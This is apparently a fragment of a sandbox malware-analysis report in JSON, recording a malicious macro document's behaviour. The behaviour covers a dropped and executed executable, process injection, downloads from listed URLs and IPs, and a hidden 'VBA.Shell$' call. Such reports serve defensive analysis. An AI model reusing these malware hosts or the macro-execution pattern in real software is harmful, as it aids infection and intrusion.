"technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\I705BA84C\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\M705BA84C", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3433", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\M705BA84C\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\public\\3292.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_non_system", "operation_desc": "Write into memory of a process running from a created or modified executable", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory", "technique_desc": "\"c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe\" modifies memory of \"c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe\"", "technique_path": "built_in._injection._modify_memory_non_system.vmray_modify_memory", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_non_system", "operation_desc": "Modify control flow of a process running from a created or modified executable", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_control_flow_non_system", "technique_desc": "\"c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe\" alters context of \"c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe\"", "technique_path": "built_in._injection._modify_control_flow_non_system.vmray_modify_control_flow_non_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1173", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"108.163.227.35:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"www.indpts.com/UHSD/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"173.201.20.6\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"159.203.94.198\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\public\\3292.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\public\\3292.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_macro_on_ws_event", "operation_desc": "Execute macro on specific worksheet event", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_macro_on_ws_event", "technique_desc": "Execute macro on \"Activate Workbook\" event.", "technique_path": "built_in._vba._execute_macro_on_ws_event.vmray_execute_macro_on_ws_event", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": "VBA.Shell$ QiiPPcnDM, 0", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }